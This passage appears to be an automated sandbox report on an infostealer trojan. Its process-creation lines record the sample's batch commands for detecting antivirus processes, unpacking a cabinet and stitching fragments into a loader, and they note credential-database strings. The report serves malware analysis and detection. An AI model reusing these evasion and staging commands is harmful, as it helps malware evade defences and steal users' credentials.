                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FEFE48_3_012FEFE4
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FEFE48_3_012FEFE4
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7E88_3_0130F7E8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130F7EB8_3_0130F7EB
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D801721_2_000D8017
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000CE14421_2_000CE144
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000BE1F021_2_000BE1F0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000EA26E21_2_000EA26E
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B22AD21_2_000B22AD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D22A221_2_000D22A2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000CC62421_2_000CC624
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000EE87F21_2_000EE87F
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0013C8A421_2_0013C8A4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00122A0521_2_00122A05
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000E6ADE21_2_000E6ADE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00118BFF21_2_00118BFF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000CCD7A21_2_000CCD7A
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000DCE1021_2_000DCE10
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000E715921_2_000E7159
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B924021_2_000B9240
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0014531121_2_00145311
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B96E021_2_000B96E0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D170421_2_000D1704
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D1A7621_2_000D1A76
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B9B6021_2_000B9B60
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D7B8B21_2_000D7B8B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D1D2021_2_000D1D20
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D7DBA21_2_000D7DBA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D1FE721_2_000D1FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 000D0DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 000CFD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: String function: 004062CF appears 57 times
                Source: es5qBEFupj.exe, 00000000.00000002.1331797007.00000000052B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe
                Source: es5qBEFupj.exe, 00000000.00000002.1322447264.0000000000AD2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe
                Source: es5qBEFupj.exeBinary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe
                Source: es5qBEFupj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.es5qBEFupj.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: es5qBEFupj.exeStatic PE information: Section: ggsvuvii ZLIB complexity 0.9946427592132202
                Source: es5qBEFupj.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/23@11/3
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001241FA GetLastError,FormatMessageW,21_2_001241FA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00112010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00112010
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00111A0B AdjustTokenPrivileges,CloseHandle,21_2_00111A0B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,21_2_0011DD87
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_004024FB CoCreateInstance,7_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00123A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,21_2_00123A0E
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\es5qBEFupj.exe.logJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Climb.com, 00000015.00000003.1579641524.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579523228.0000000003A20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: es5qBEFupj.exeVirustotal: Detection: 33%
                Source: es5qBEFupj.exeReversingLabs: Detection: 39%
                Source: es5qBEFupj.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: es5qBEFupj.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                Source: unknownProcess created: C:\Users\user\Desktop\es5qBEFupj.exe "C:\Users\user\Desktop\es5qBEFupj.exe"
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: msasn1.dllJump to behavior
